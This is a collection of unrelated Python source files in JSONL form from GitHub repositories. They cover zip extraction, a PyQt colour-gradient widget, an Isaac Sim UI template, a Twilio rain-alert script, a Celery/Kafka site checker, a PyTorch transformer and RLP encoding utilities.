+{"seq_id":"29116367561","text":"\"Extract files archive in zip folder\"\nfrom pathlib import Path\nimport zipfile\n\ndef extract_files(directory):\n \"extract files from zip file to specified path\"\n root_dir = Path(directory)\n\n # check for zip file one level deep in directory (use rglob for more levels)\n for path in root_dir.glob('*.zip'):\n # read zip file and create path name for extracted files\n with zipfile.ZipFile(path, 'r') as zf:\n final_path = root_dir/ Path(path.stem)\n zf.extractall(path=final_path)\n","repo_name":"Inge-bot/automation_with_python","sub_path":"pathlib/extract_zip.py","file_name":"extract_zip.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10443616815","text":"from PyQt5 import QtCore, QtGui, QtWidgets\n\nimport numpy as np\nfrom scipy import interpolate\n\nclass GradientItem(QtWidgets.QGraphicsView):\n\n sigDoubleClick = QtCore.pyqtSignal()\n 
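# pyqtSignal objects must be declared as class attributes; each instance\n    # gets bound signals (sigGradientChanged is emitted with the item itself).\n    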
sigGradientChanged = QtCore.pyqtSignal(object)\n\n def __init__(self, orientation='horizontal', **kargs):\n super(GradientItem, self).__init__()\n self.orientation = orientation\n self.length = 100\n self.maxDim = 10\n self.rectSize = 10\n self.B = 0.5\n self.C = 1.0\n self.G = 1.0\n self.Angle = 0\n\n defaultColmap = [[0.0, [0, 0, 0, 255]], [1.0, [255, 255, 255, 255]]]\n self.setupColmap(defaultColmap)\n\n self.orientations = {'horizontal': (0, 1, 1), 'vertical': (90, 1, 1)}\n\n self.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n self.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n\n self.scene = QtWidgets.QGraphicsScene()\n self.setScene(self.scene)\n\n # self.gradRect = QtGui.QGraphicsRectItem(QtCore.QRectF(0, self.rectSize, 100, self.rectSize))\n # self.backgroundRect = QtGui.QGraphicsRectItem(QtCore.QRectF(0, -self.rectSize, 100, self.rectSize))\n # self.backgroundRect.setBrush(QtGui.QBrush(QtCore.Qt.DiagCrossPattern))\n #\n self.setOrientation(orientation)\n\n # self.backgroundRect.setParentItem(self)\n # self.gradRect.setParentItem(self)\n\n self.setMaxDim(self.rectSize)\n\n self.updateGradient()\n\n def paint(self, p, opt, widget):\n return\n\n def mouseDoubleClickEvent(self, ev):\n self.sigDoubleClick.emit()\n\n def keyPressEvent(self, ev):\n ev.ignore()\n\n def setMaxDim(self, mx=None):\n if mx is None:\n mx = self.maxDim\n else:\n self.maxDim = mx\n\n if self.orientation == 'horizontal':\n self.setFixedHeight(mx)\n self.setMaximumWidth(16777215)\n else:\n self.setFixedWidth(mx)\n self.setMaximumHeight(16777215)\n\n def setFixedHeight(self, h):\n self.setMaximumHeight(h)\n self.setMinimumHeight(h)\n\n def setFixedWidth(self, h):\n self.setMaximumWidth(h)\n self.setMinimumWidth(h)\n\n def height(self):\n return self.geometry().height()\n\n def width(self):\n return self.geometry().width()\n\n def setOrientation(self, orientation):\n self.orientation = orientation\n self.setMaxDim()\n self.resetTransform()\n ort = orientation\n if ort == 'horizontal':\n self.translate(0, self.height()-1)\n elif ort == 'vertical':\n self.rotate(270)\n self.scale(1, -1)\n self.translate(-self.height()-1, 0)\n else:\n raise Exception(\"%s is not a valid orientation. 
Options are \\\n 'horizontal', and 'vertical'\" % str(ort))\n\n def widgetLength(self):\n if self.orientation == 'horizontal':\n return self.width()\n else:\n return self.height()\n\n def resizeEvent(self, ev):\n wlen = max(40, self.widgetLength())\n self.setLength(wlen-2)\n self.setOrientation(self.orientation)\n\n def setLength(self, newLen):\n self.length = float(newLen)\n # self.backgroundRect.setRect(1, -self.rectSize, newLen, self.rectSize)\n # self.gradRect.setRect(1, -self.rectSize, newLen, self.rectSize)\n self.updateGradient()\n\n def mouseClickEvent(self, ev):\n # add double click event to reset?\n pass\n\n def updateGradient(self):\n self.gradient = self.getGradient()\n # self.gradRect.setBrush(QtGui.QBrush(self.gradient))\n self.scene.setBackgroundBrush(QtGui.QBrush(self.gradient))\n self.scene.setSceneRect(QtCore.QRectF(0.0, 0, self.length, self.length))\n # self.setBackgroundBrush(QtGui.QBrush(self.gradient))\n self.sigGradientChanged.emit(self)\n\n def getGradient(self):\n \"\"\"Return a QLinearGradient object.\"\"\"\n g = QtGui.QLinearGradient(QtCore.QPointF(0, 0),\n QtCore.QPointF(self.length, 0))\n stops = self.stops\n g.setStops([(x, QtGui.QColor(t[0], t[1], t[2])) for x, t in stops])\n return g\n\n def changeColmap(self, cmap):\n self.setupColmap(cmap)\n self.doBCG()\n\n def setupColmap(self, cmap):\n self.origStops = []\n self.stops = []\n\n p = []\n r = []\n g = []\n b = []\n a = []\n\n if type(cmap) == np.ndarray and cmap.shape == (256, 4):\n for i in range(256):\n p.append(i / 255.0)\n r.append(cmap[i, 0])\n g.append(cmap[i, 1])\n b.append(cmap[i, 2])\n a.append(cmap[i, 3])\n else:\n for x, t in cmap:\n p.append(x)\n r.append(t[0])\n g.append(t[1])\n b.append(t[2])\n a.append(t[3])\n\n self.r_interp = interpolate.interp1d(p, r)\n self.g_interp = interpolate.interp1d(p, g)\n self.b_interp = interpolate.interp1d(p, b)\n self.a_interp = interpolate.interp1d(p, a)\n\n p = np.linspace(0.0, 1.0, 256)\n\n r = self.r_interp(p)\n g = self.g_interp(p)\n b = self.b_interp(p)\n a = self.a_interp(p)\n\n for i, j, k, l, m in zip(p, r, g, b, a):\n self.origStops.append([i, [j, k, l, m]])\n\n self.stops = self.origStops.copy()\n\n def updateBCG(self, B, C, G):\n self.B = B\n self.C = C\n self.G = G\n self.doBCG()\n\n def doBCG(self):\n grid = []\n p = []\n r = []\n g = []\n b = []\n a = []\n\n for x, t in self.origStops:\n xt = x**self.G\n xn = self.C*(xt-self.B)+0.5\n grid.append(xn)\n\n grid = np.clip(grid, 0.0, 1.0)\n\n p = np.linspace(0.0, 1.0, 256)\n\n r = self.r_interp(grid)\n g = self.g_interp(grid)\n b = self.b_interp(grid)\n a = self.a_interp(grid)\n\n self.stops = [[i, [j, k, l, m]] for i, j, k, l, m in zip(p, r, g, b, a)]\n\n self.updateGradient()\n\n def updateAngle(self, Angle):\n self.Angle = Angle\n self.doAngle()\n\n def doAngle(self):\n c = [i[1] for i in self.origStops]\n i = round((self.Angle / 360) * 255)\n cols = c[i:] + c[:i]\n\n p = np.linspace(0.0, 1.0, 256)\n\n self.stops = [[j, k] for j, k in zip(p, cols)]\n\n self.updateGradient()\n\n def getLookupTable(self, nPts, alpha=False, original=False):\n if alpha:\n table = np.empty((nPts, 4), dtype=np.ubyte)\n else:\n table = np.empty((nPts, 3), dtype=np.ubyte)\n\n for i in range(nPts):\n x = float(i)/(nPts-1)\n color = self.getColor(x, toQColor=False, original=original)\n table[i] = color[:table.shape[1]]\n\n return table\n\n def getColor(self, x, toQColor=True, original=False):\n if original:\n stops = self.origStops\n else:\n stops = self.stops\n\n if x <= stops[0][0]:\n c = stops[0][1]\n if toQColor:\n # 
always copy colors before handing them out\n return QtGui.QColor(c)\n else:\n return c[0], c[1], c[2], c[3]\n if x >= stops[-1][0]:\n c = stops[-1][1]\n if toQColor:\n # always copy colors before handing them out\n return QtGui.QColor(c)\n else:\n return c[0], c[1], c[2], c[3]\n\n x2 = stops[0][0]\n for i in range(1, len(stops)):\n x1 = x2\n x2 = stops[i][0]\n if x1 <= x <= x2:\n break\n\n dx = x2 - x1\n if dx == 0:\n f = 0.\n else:\n f = (x-x1) / dx\n c1 = stops[i-1][1] # colour\n c2 = stops[i][1]\n # if self.colorMode == 'rgb':\n r = c1[0] * (1.-f) + c2[0] * f\n g = c1[1] * (1.-f) + c2[1] * f\n b = c1[2] * (1.-f) + c2[2] * f\n a = c1[3] * (1.-f) + c2[3] * f\n if toQColor:\n return QtGui.QColor(int(r), int(g), int(b), int(a))\n else:\n return (r, g, b, a)\n","repo_name":"JJPPeters/EMPeaks","sub_path":"src/GUI/Controls/ImageInfoWidget/gradient_item.py","file_name":"gradient_item.py","file_ext":"py","file_size_in_byte":8222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74456226064","text":"import omni.ui as ui\n\nfrom omni.isaac.ui.element_wrappers import (\n FloatField,\n IntField,\n StringField,\n CheckBox,\n DropDown,\n CollapsableFrame,\n TextBlock,\n ColorPicker,\n Button,\n StateButton,\n)\n\nfrom omni.isaac.ui.ui_utils import get_style\n\nfrom typing import List\nimport os\n\n\nclass UIBuilder:\n def __init__(self):\n # Frames are sub-windows that can contain multiple UI elements\n self.frames = []\n\n # UI elements created using a UIElementWrapper from omni.isaac.ui.element_wrappers\n self.wrapped_ui_elements = []\n\n ###################################################################################\n # The Functions Below Are Called Automatically By extension.py\n ###################################################################################\n\n def on_menu_callback(self):\n \"\"\"Callback for when the UI is opened from the toolbar. \n This is called directly after build_ui().\n \"\"\"\n pass\n\n def on_timeline_event(self, event):\n \"\"\"Callback for Timeline events (Play, Pause, Stop)\n\n Args:\n event (omni.timeline.TimelineEventType): Event Type\n \"\"\"\n pass\n\n def on_physics_step(self, step):\n \"\"\"Callback for Physics Step.\n Physics steps only occur when the timeline is playing\n \n Args:\n step (float): Size of physics step\n \"\"\"\n pass\n\n def on_stage_event(self, event):\n \"\"\"Callback for Stage Events\n\n Args:\n event (omni.usd.StageEventType): Event Type\n \"\"\"\n pass\n\n def cleanup(self):\n \"\"\"\n Called when the stage is closed or the extension is hot reloaded.\n Perform any necessary cleanup such as removing active callback functions\n Buttons imported from omni.isaac.ui.element_wrappers implement a cleanup function that should be called\n \"\"\"\n # None of the UI elements in this template actually have any internal state that needs to be cleaned up.\n # But it is best practice to call cleanup() on all wrapped UI elements to simplify development.\n for ui_elem in self.wrapped_ui_elements:\n ui_elem.cleanup()\n\n def build_ui(self):\n \"\"\"\n Build a custom UI tool to run your extension. 
\n This function will be called any time the UI window is closed and reopened.\n \"\"\"\n # Create a UI frame that prints the latest UI event.\n self._create_status_report_frame()\n\n # Create a UI frame demonstrating simple UI elements for user input\n self._create_simple_editable_fields_frame()\n\n # Create a UI frame with different button types\n self._create_buttons_frame()\n\n # Create a UI frame with different selection widgets\n self._create_selection_widgets_frame()\n\n def _create_status_report_frame(self):\n self._status_report_frame = CollapsableFrame(\"Status Report\", collapsed=False)\n with self._status_report_frame:\n with ui.VStack(style=get_style(), spacing=5, height=0):\n self._status_report_field = TextBlock(\n \"Last UI Event\",\n num_lines=3,\n tooltip=\"Prints the latest change to this UI\",\n include_copy_button=True,\n )\n\n def _create_simple_editable_fields_frame(self):\n self._simple_fields_frame = CollapsableFrame(\"Simple Editable Fields\", collapsed=False)\n\n with self._simple_fields_frame:\n with ui.VStack(style=get_style(), spacing=5, height=0):\n int_field = IntField(\n \"Int Field\",\n default_value=1,\n tooltip=\"Type an int or click and drag to set a new value.\",\n lower_limit=-100,\n upper_limit=100,\n on_value_changed_fn=self._on_int_field_value_changed_fn,\n )\n self.wrapped_ui_elements.append(int_field)\n\n float_field = FloatField(\n \"Float Field\",\n default_value=1.0,\n tooltip=\"Type a float or click and drag to set a new value.\",\n step=0.5,\n format=\"%.2f\",\n lower_limit=-100.0,\n upper_limit=100.0,\n on_value_changed_fn=self._on_float_field_value_changed_fn,\n )\n self.wrapped_ui_elements.append(float_field)\n\n def is_usd_or_python_path(file_path: str):\n # Filter file paths shown in the file picker to only be USD or Python files\n _, ext = os.path.splitext(file_path.lower())\n return ext == \".usd\" or ext == \".py\"\n\n string_field = StringField(\n \"String Field\",\n default_value=\"Type Here or Use File Picker on the Right\",\n tooltip=\"Type a string or use the file picker to set a value\",\n read_only=False,\n multiline_okay=False,\n on_value_changed_fn=self._on_string_field_value_changed_fn,\n use_folder_picker=True,\n item_filter_fn=is_usd_or_python_path,\n )\n self.wrapped_ui_elements.append(string_field)\n\n def _create_buttons_frame(self):\n buttons_frame = CollapsableFrame(\"Buttons Frame\", collapsed=False)\n\n with buttons_frame:\n with ui.VStack(style=get_style(), spacing=5, height=0):\n button = Button(\n \"Button\",\n \"CLICK ME\",\n tooltip=\"Click This Button to activate a callback function\",\n on_click_fn=self._on_button_clicked_fn,\n )\n self.wrapped_ui_elements.append(button)\n\n state_button = StateButton(\n \"State Button\",\n \"State A\",\n \"State B\",\n tooltip=\"Click this button to transition between two states\",\n on_a_click_fn=self._on_state_btn_a_click_fn,\n on_b_click_fn=self._on_state_btn_b_click_fn,\n physics_callback_fn=None, # See Loaded Scenario Template for example usage\n )\n self.wrapped_ui_elements.append(state_button)\n\n check_box = CheckBox(\n \"Check Box\",\n default_value=False,\n tooltip=\" Click this checkbox to activate a callback function\",\n on_click_fn=self._on_checkbox_click_fn,\n )\n check_box.visible = False\n self.wrapped_ui_elements.append(check_box)\n\n def _create_selection_widgets_frame(self):\n self._selection_widgets_frame = CollapsableFrame(\"Selection Widgets\", collapsed=False)\n\n with self._selection_widgets_frame:\n with ui.VStack(style=get_style(), spacing=5, 
height=0):\n\n def dropdown_populate_fn():\n return [\"Option A\", \"Option B\", \"Option C\"]\n\n dropdown = DropDown(\n \"Drop Down\",\n tooltip=\" Select an option from the DropDown\",\n populate_fn=dropdown_populate_fn,\n on_selection_fn=self._on_dropdown_item_selection,\n )\n self.wrapped_ui_elements.append(dropdown)\n\n dropdown.repopulate() # This does not happen automatically, and it triggers the on_selection_fn\n\n color_picker = ColorPicker(\n \"Color Picker\",\n default_value=[0.69, 0.61, 0.39, 1.0],\n tooltip=\"Select a Color\",\n on_color_picked_fn=self._on_color_picked,\n )\n self.wrapped_ui_elements.append(color_picker)\n\n ######################################################################################\n # Functions Below This Point Are Callback Functions Attached to UI Element Wrappers\n ######################################################################################\n\n def _on_int_field_value_changed_fn(self, new_value: int):\n status = f\"Value was changed in int field to {new_value}\"\n self._status_report_field.set_text(status)\n\n def _on_float_field_value_changed_fn(self, new_value: float):\n status = f\"Value was changed in float field to {new_value}\"\n self._status_report_field.set_text(status)\n\n def _on_string_field_value_changed_fn(self, new_value: str):\n status = f\"Value was changed in string field to {new_value}\"\n self._status_report_field.set_text(status)\n\n def _on_button_clicked_fn(self):\n status = \"The Button was Clicked!\"\n self._status_report_field.set_text(status)\n\n def _on_state_btn_a_click_fn(self):\n status = \"State Button was Clicked in State A!\"\n self._status_report_field.set_text(status)\n\n def _on_state_btn_b_click_fn(self):\n status = \"State Button was Clicked in State B!\"\n self._status_report_field.set_text(status)\n\n def _on_checkbox_click_fn(self, value: bool):\n status = f\"CheckBox was set to {value}!\"\n self._status_report_field.set_text(status)\n\n def _on_dropdown_item_selection(self, item: str):\n status = f\"{item} was selected from DropDown\"\n self._status_report_field.set_text(status)\n\n def _on_color_picked(self, color: List[float]):\n formatted_color = [float(\"%0.2f\" % i) for i in color]\n status = f\"RGBA Color {formatted_color} was picked in the ColorPicker\"\n self._status_report_field.set_text(status)\n","repo_name":"swadaskar/Isaac_Sim_Folder","sub_path":"exts/omni.isaac.extension_templates/template_source_files/ui_component_library/ui_builder.py","file_name":"ui_builder.py","file_ext":"py","file_size_in_byte":9765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39579994047","text":"import requests\r\n\r\nfrom twilio.rest import Client\r\n\r\nAPI_KEY = \"Your api key\"\r\nMY_LAT = 8.695\r\nMY_LON = 76.8179\r\nOWM_ENDPOINT = \"https://api.openweathermap.org/data/2.5/onecall\"\r\naccount_sid = \"your account sid\"\r\nauth_token = \"your auth token\"\r\n\r\nparameters = {\r\n \"lat\": MY_LAT,\r\n \"lon\": MY_LON,\r\n \"appid\": API_KEY,\r\n \"exclude\": \"current,minutely,daily\"\r\n}\r\n\r\n\r\nresponse = requests.get(OWM_ENDPOINT, params=parameters)\r\nresponse.raise_for_status()\r\nweather_data = response.json()\r\n\r\n# weather_data_id = weather_data[\"hourly\"][0][\"weather\"][0][\"id\"] # accessing first hour id\r\n\r\n# slicing data from json to get next 12 hours forecast\r\nweather_data_id = weather_data[\"hourly\"][:12]\r\n\r\nwill_rain = False\r\nfor hour_data in weather_data_id: # getting hold of items under weather 
key\r\n condition_id = hour_data[\"weather\"][0][\"id\"]\r\n if condition_id < 700: # check if both sides are int\r\n will_rain = True\r\n\r\n\r\nif will_rain:\r\n\r\n\r\n client = Client(account_sid, auth_token)\r\n\r\n message = client.messages \\\r\n .create(body=\"It's going to rain today. Bring an umbrella.\", from_=\"+19036664583\", to='your phone number')\r\n\r\n print(message.status)\r\n","repo_name":"NithinNazar/Python_Projects","sub_path":"day_35_rain_alert/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30844816305","text":"import logging\nfrom typing import List\n\nimport sentry_sdk\nfrom celery import Celery\nfrom sentry_sdk.integrations.logging import LoggingIntegration\n\nfrom checker_kafka.kafka_producer.producer import CheckerProducer\nfrom configuration.config import celery_config, main_config, sentry_config, kafka_producer_config\nfrom parser.parser import parse\n\nsentry_logging = LoggingIntegration(\n level=logging.INFO, # Capture info and above as breadcrumbs\n event_level=logging.ERROR # Send errors as events\n)\n\nsentry_sdk.init(\n dsn=sentry_config()['dns'],\n integrations=[sentry_logging]\n)\n\napp = Celery(**celery_config())\n\n\n@app.on_after_configure.connect\ndef setup_periodic_tasks(sender, **kwargs):\n \"\"\"\n setup periodic tasks for celery\n \"\"\"\n logging.info('setup periodic tasks')\n cfg = main_config()\n period = cfg['period']\n sender.add_periodic_task(period, checker.s(cfg['url'], cfg['patterns']), name='checker')\n\n\n@app.task\ndef checker(url: str, patterns: List[str]):\n \"\"\"\n periodic task\n :param url: target url\n :param patterns: list of regex\n \"\"\"\n logging.info('start checker')\n status_code, elapsed, results = parse(url, patterns)\n logging.info(\n f'checker results for {url} ({patterns}) status_code: {status_code}, elapsed: {elapsed}, results: {results}.'.format(\n url=url, patterns=patterns, status_code=status_code, elapsed=elapsed, results=results))\n producer = CheckerProducer(kafka_producer_config())\n logging.info('send message')\n producer.send_message(status_code, elapsed, results)\n logging.info('message have been sent')\n","repo_name":"vizir1989/aiven","sub_path":"checker/checker_producer.py","file_name":"checker_producer.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1107912632","text":"import numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom .activations import GELU\n\n\nclass WordEmbedding(nn.Module):\n def __init__(self, vocab_size, d_model):\n \"\"\"\n vocab_size: number of words in the vocabulary\n d_model: model's dimension size\n \"\"\"\n super().__init__()\n self.embed = nn.Embedding(vocab_size, d_model)\n\n def forward(self, x):\n return self.embed(x)\n\n\nclass PositionalEncoding(nn.Module):\n def __init__(self, npos, d_model, sinusoid=True):\n \"\"\"\n npos: number of positions\n d_model: model's dimension size\n \"\"\"\n super().__init__()\n self.d_model = d_model\n self.sinusoid = sinusoid\n if sinusoid:\n pos = torch.arange(0, npos, 1).float()\n index = torch.arange(0, d_model, 1) // 2 * 2\n index = index.float() / d_model\n index = 10000**index\n pe = pos[:, None] / index[None, :]\n pe[:, 0::2] = torch.sin(pe[:, 0::2])\n pe[:, 1::2] = torch.cos(pe[:, 1::2])\n pe = pe[None, :]\n self.register_buffer('pe', pe)\n else:\n 
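# learned positional embeddings instead of the fixed sinusoid table; the\n            # 0.02-stddev normal init mirrors common transformer practice.\n            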
self.pe = nn.Parameter(torch.from_numpy(np.float32(np.random.normal(0., 0.02, (1, npos, d_model)))))\n\n    def forward(self, x):\n        \"\"\"\n        x: a tensor of size (batch_size, max_len, d_model)\n        \"\"\"\n        return x * (self.d_model ** 0.5) + self.pe[:, :x.size(1)]\n\n\ndef get_seq_mask(lens, device):\n    mask = torch.arange(0, lens.max(), 1)[None, :].to(device) >= lens[:, None]\n    mask = mask[:, None, None, :]\n    return mask\n\n\ndef apply_mask(x, mask):\n    x.masked_fill_(mask, float('-inf'))\n    return x\n\n\ndef get_look_ahead_mask(max_len, device):\n    mask = torch.triu(torch.ones(max_len, max_len, dtype=torch.uint8), 1).to(device)\n    mask = mask[None, None, ...]\n    return mask\n\n\nclass MultiHeadAtt(nn.Module):\n    def __init__(self, nheads, d_model, dropout):\n        \"\"\"\n        nheads: number of heads\n        d_model: model's dimension size\n        \"\"\"\n        assert d_model % nheads == 0, 'd_model must be divisible by nheads'\n        super().__init__()\n        self.nheads = nheads\n        self.d_model = d_model\n        self.d_k = d_model // nheads\n\n        self.q_linear = nn.Linear(d_model, d_model, bias=False)\n        self.v_linear = nn.Linear(d_model, d_model, bias=False)\n        self.k_linear = nn.Linear(d_model, d_model, bias=False)\n        self.att_drop = nn.Dropout(dropout)\n        self.out = nn.Linear(d_model, d_model, bias=False)\n        self.drop = nn.Dropout(dropout)\n\n    def forward(self, Q, K, V, mask):\n        \"\"\"\n        Q: tensor of shape (batch_size, max_len, d_model)\n        K: tensor of shape (batch_size, max_len, d_model)\n        V: tensor of shape (batch_size, max_len, d_model)\n        mask: boolean mask applied to the attention scores\n        \"\"\"\n        bs = Q.size(0)\n\n        # use the dedicated projection for each of Q, K and V;\n        # k is laid out as (bs, heads, d_k, len) so q @ k yields the scores\n        q = self.q_linear(Q).view(bs, -1, self.nheads, self.d_k).permute(0, 2, 1, 3)\n        k = self.k_linear(K).view(bs, -1, self.nheads, self.d_k).permute(0, 2, 3, 1)\n        v = self.v_linear(V).view(bs, -1, self.nheads, self.d_k).permute(0, 2, 1, 3)\n\n        score = torch.matmul(q, k) / (self.d_k**0.5)\n        score = apply_mask(score, mask)\n        score = F.softmax(score, dim=-1)\n        score = self.att_drop(score)\n\n        outputs = torch.matmul(score, v)\n        outputs = outputs.permute(0, 2, 1, 3).contiguous().view(bs, -1, self.d_model)\n        outputs = self.out(outputs)\n        outputs = self.drop(outputs)\n\n        return outputs\n\n\nclass PositionwiseFeedForward(nn.Module):\n    def __init__(self, d_model, d_ff, dropout):\n        super().__init__()\n        self.layers = nn.Sequential(\n            nn.Linear(d_model, d_ff),\n            GELU(),\n            nn.Linear(d_ff, d_model),\n            nn.Dropout(dropout)\n        )\n\n    def forward(self, x):\n        return self.layers(x)\n\n\nclass SubLayer(nn.Module):\n    def __init__(self, d_model):\n        super().__init__()\n        self.ln = nn.LayerNorm(d_model)\n\n    def forward(self, outputs, inputs):\n        return self.ln(outputs + inputs)\n\n\nclass BasicLayer(nn.Module):\n    def __init__(self, d_model, nheads, d_ff, dropout):\n        super().__init__()\n        self.mult_att = MultiHeadAtt(nheads, d_model, dropout)\n        self.sub1 = SubLayer(d_model)\n        self.ff = PositionwiseFeedForward(d_model, d_ff, dropout)\n        self.sub2 = SubLayer(d_model)\n\n    def forward(self, q, k, v, mask):\n        x = self.sub1(self.mult_att(q, k, v, mask), q)\n        x = self.sub2(self.ff(x), x)\n        return x\n\n\nclass EncoderLayer(BasicLayer):\n    def __init__(self, d_model, nheads, d_ff, dropout):\n        super().__init__(d_model, nheads, d_ff, dropout)\n\n    def forward(self, x, mask):\n        return super().forward(x, x, x, mask)\n\n\nclass BasicDecoderLayer(BasicLayer):\n    def __init__(self, d_model, nheads, d_ff, dropout):\n        super().__init__(d_model, nheads, d_ff, dropout)\n\n    def forward(self, x, mask):\n        return super().forward(x, x, x, mask)\n\n\nclass DecoderLayer(BasicLayer):\n    def __init__(self, d_model, 
nheads, d_ff, dropout):\n super().__init__(d_model, nheads, d_ff, dropout)\n self.first_mult_att = MultiHeadAtt(nheads, d_model, dropout)\n self.first_sub = SubLayer(d_model)\n\n def forward(self, x, mask, enc_input, enc_mask):\n outputs = self.first_sub(self.first_mult_att(x, x, x, mask), x)\n outputs = super().forward(outputs, enc_input, enc_input, enc_mask)\n return outputs\n\n\nclass TransformerEncoder(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, vocab_size, npos, dropout, pos_enc_sinusoid=True, layer_output=False):\n super().__init__()\n self.embed = WordEmbedding(vocab_size, d_model)\n self.pos_enc = PositionalEncoding(npos, d_model, pos_enc_sinusoid)\n self.dropout = nn.Dropout(dropout)\n\n self.layers = nn.ModuleList([\n EncoderLayer(d_model, nheads, d_ff, dropout) for _ in range(nlayers)\n ])\n self.layer_output = layer_output\n\n def forward(self, x, lens):\n outputs = self.embed(x)\n outputs = self.pos_enc(outputs)\n outputs = self.dropout(outputs)\n mask = get_seq_mask(lens, x.device)\n if self.layer_output:\n layer_outputs = []\n for layer in self.layers:\n outputs = layer(outputs, mask)\n if self.layer_output:\n layer_outputs.append(outputs)\n if self.layer_output:\n return layer_outputs, mask\n return outputs, mask\n\n\nclass TransformerDecoder(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, vocab_size, npos, dropout, pos_enc_sinusoid=True):\n super().__init__()\n self.embed = WordEmbedding(vocab_size, d_model)\n self.pos_enc = PositionalEncoding(npos, d_model, pos_enc_sinusoid)\n self.dropout = nn.Dropout(dropout)\n\n self.layers = nn.ModuleList([\n DecoderLayer(d_model, nheads, d_ff, dropout) for _ in range(nlayers)\n ])\n\n def forward(self, x, enc_input, enc_mask):\n outputs = self.embed(x)\n outputs = self.pos_enc(outputs)\n outputs = self.dropout(outputs)\n mask = get_look_ahead_mask(x.size(1), x.device)\n for layer in self.layers:\n outputs = layer(outputs, mask, enc_input, enc_mask)\n return outputs\n\n\nclass TransformerIndependentDecoder(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, vocab_size, npos, dropout, pos_enc_sinusoid=True):\n super().__init__()\n self.embed = WordEmbedding(vocab_size, d_model)\n self.pos_enc = PositionalEncoding(npos, d_model, pos_enc_sinusoid)\n self.dropout = nn.Dropout(dropout)\n\n self.layers = nn.ModuleList([\n BasicDecoderLayer(d_model, nheads, d_ff, dropout) for _ in range(nlayers)\n ])\n\n def forward(self, x):\n outputs = self.embed(x)\n outputs = self.pos_enc(outputs)\n outputs = self.dropout(outputs)\n mask = get_look_ahead_mask(x.size(1), x.device)\n for layer in self.layers:\n outputs = layer(outputs, mask)\n return outputs\n\n\nclass Transformer(nn.Module):\n def __init__(self, nlayers, d_model, nheads, d_ff, src_vocab_size, tgt_vocab_size, npos, dropout):\n super().__init__()\n self.encoder = TransformerEncoder(nlayers, d_model, nheads, d_ff, src_vocab_size, npos, dropout)\n self.decoder = TransformerDecoder(nlayers, d_model, nheads, d_ff, tgt_vocab_size, npos, dropout)\n self.out = nn.Linear(d_model, tgt_vocab_size)\n\n def forward(self, src, src_lens, tgt):\n outputs, mask = self.encoder(src, src_lens)\n outputs = self.decoder(tgt, outputs, mask)\n outputs = self.out(outputs)\n return outputs\n\n\nclass LinearDecoder(nn.Module):\n def __init__(self, in_features=None, out_features=None, weights=None, bias=None):\n super().__init__()\n if weights is not None:\n self.register_parameter('weight', weights)\n else:\n self.register_parameter('weight', 
nn.Parameter(torch.Tensor(in_features, out_features)))\n if bias is not None:\n self.register_parameter('bias', bias)\n else:\n self.register_parameter('bias', nn.Parameter(torch.Tensor(out_features)))\n\n def forward(self, x):\n return torch.nn.functional.linear(x, self.weight, self.bias)\n","repo_name":"trungtrinh44/transformer","sub_path":"pytorch/transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":9423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31923398702","text":"import abc\nimport struct\n\n\nclass Atomic(object):\n\n \"\"\"ABC for objects that can be RLP encoded as is.\"\"\"\n __metaclass__ = abc.ABCMeta\n\n\nAtomic.register(str)\nAtomic.register(bytearray)\nAtomic.register(unicode)\n\nstr_to_bytes = bytes_to_str = str\nascii_chr = chr\n\n\ndef int_to_big_endian(value):\n cs = []\n while value > 0:\n cs.append(chr(value % 256))\n value /= 256\n s = ''.join(reversed(cs))\n return s\n\n\ndef big_endian_to_int(value):\n if len(value) == 1:\n return ord(value)\n elif len(value) <= 8:\n return struct.unpack('>Q', value.rjust(8, '\\x00'))[0]\n else:\n return int(encode_hex(value), 16)\n\n\ndef is_integer(value):\n return isinstance(value, (int, long))\n\n\ndef decode_hex(s):\n if not isinstance(s, (str, unicode)):\n raise TypeError('Value must be an instance of str or unicode')\n return s.decode('hex')\n\n\ndef encode_hex(s):\n if not isinstance(s, (str, unicode)):\n raise TypeError('Value must be an instance of str or unicode')\n return s.encode('hex')\n\n\nsafe_ord = ord\n","repo_name":"vapory-legacy/pyrlp","sub_path":"rlp/utils_py2.py","file_name":"utils_py2.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3832901396","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nget_ipython().system('pip freeze | grep scikit-learn')\n\n\n# In[27]:\n\n\nimport pickle\nimport pandas as pd\nimport numpy as np\nimport datetime\n\n\n# In[3]:\n\n\nwith open('model.bin', 'rb') as f_in:\n dv, lr = pickle.load(f_in)\n\n\n# In[4]:\n\n\ncategorical = ['PUlocationID', 'DOlocationID']\n\ndef read_data(filename):\n df = pd.read_parquet(filename)\n \n df['duration'] = df.dropOff_datetime - df.pickup_datetime\n df['duration'] = df.duration.dt.total_seconds() / 60\n\n df = df[(df.duration >= 1) & (df.duration <= 60)].copy()\n\n df[categorical] = df[categorical].fillna(-1).astype('int').astype('str')\n \n return df\n\n\n# In[30]:\n\n\ndf=read_data('./data/fhv_tripdata_2021-02.parquet')\n\n\n# In[31]:\n\n\ndicts = df[categorical].to_dict(orient='records')\nX_val = dv.transform(dicts)\ny_pred = lr.predict(X_val)\n\n\n# In[32]:\n\n\nprint(y_pred.mean())\n\n\n# In[33]:\n\n\ndf\n\n\n# 